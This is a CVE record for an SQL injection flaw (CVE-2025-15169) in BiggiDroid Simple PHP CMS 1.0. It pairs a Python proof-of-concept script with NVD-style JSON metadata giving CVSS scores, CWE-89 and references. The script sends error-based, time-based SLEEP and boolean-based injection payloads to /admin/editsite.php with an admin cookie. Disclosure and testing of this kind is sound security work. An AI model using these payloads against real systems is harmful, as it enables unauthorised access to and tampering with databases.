CVE-2025-15169

import requests import sys # CVE-2025-15169 SQL Injection PoC for BiggiDroid Simple PHP CMS 1.0 # Target: /admin/editsite.php # Parameter: ID def test_sql_injection(target_url, cookie): """ Test for SQL injection vulnerability in BiggiDroid Simple PHP CMS Requires admin authentication cookie """ # Basic test - simple quote to trigger SQL error payload_error = "'" # Time-based blind SQL injection using SLEEP() # Replace 5 with higher value for testing payload_time = "' AND (SELECT * FROM (SELECT SLEEP(5))a) AND '1'='1" # Boolean-based blind SQL injection payload_boolean = "' AND 1=1 AND '1'='1" payload_boolean_false = "' AND 1=2 AND '1'='1" headers = { 'Cookie': cookie, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } print(f"[*] Testing target: {target_url}") print("[*] Testing basic SQL injection...") # Test 1: Error-based injection test_url = f"{target_url}/admin/editsite.php?id={payload_error}" try: resp = requests.get(test_url, headers=headers, timeout=10) if 'sql' in resp.text.lower() or 'error' in resp.text.lower(): print("[+] Potential SQL injection detected (error-based)") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") # Test 2: Time-based blind injection print("[*] Testing time-based blind SQL injection...") test_url = f"{target_url}/admin/editsite.php?id=1{payload_time}" try: resp = requests.get(test_url, headers=headers, timeout=15) print("[+] Time-based test completed") except requests.exceptions.Timeout: print("[+] Time-based SQL injection confirmed (request timed out)") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") # Test 3: Boolean-based blind injection print("[*] Testing boolean-based blind SQL injection...") test_url_true = f"{target_url}/admin/editsite.php?id=1{payload_boolean}" test_url_false = f"{target_url}/admin/editsite.php?id=1{payload_boolean_false}" try: resp_true = requests.get(test_url_true, headers=headers, timeout=10) resp_false = requests.get(test_url_false, headers=headers, timeout=10) # Compare response lengths or content if len(resp_true.text) != len(resp_false.text): print("[+] Boolean-based SQL injection detected") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("[*] PoC testing completed") if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <admin_cookie>") print(f"Example: python {sys.argv[0]} http://target.com 'PHPSESSID=abc123'") sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] test_sql_injection(target, cookie)

{"cve": {"id": "CVE-2025-15169", "sourceIdentifier": "[email protected]", "published": "2025-12-29T04:15:49.780", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in BiggiDroid Simple PHP CMS 1.0. Affected by this issue is some unknown functionality of the file /admin/editsite.php. Executing a manipulation of the argument ID can lead to sql injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:biggidroid:simple_php_cms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F8E2916D-54CD-4685-A440-3C903FF5B2C9"}]}]}], "references": [{"url": "https://gitee.com/sun-huizhi/dazhi/issues/IDBDAY", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338549", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338549", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.708845", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}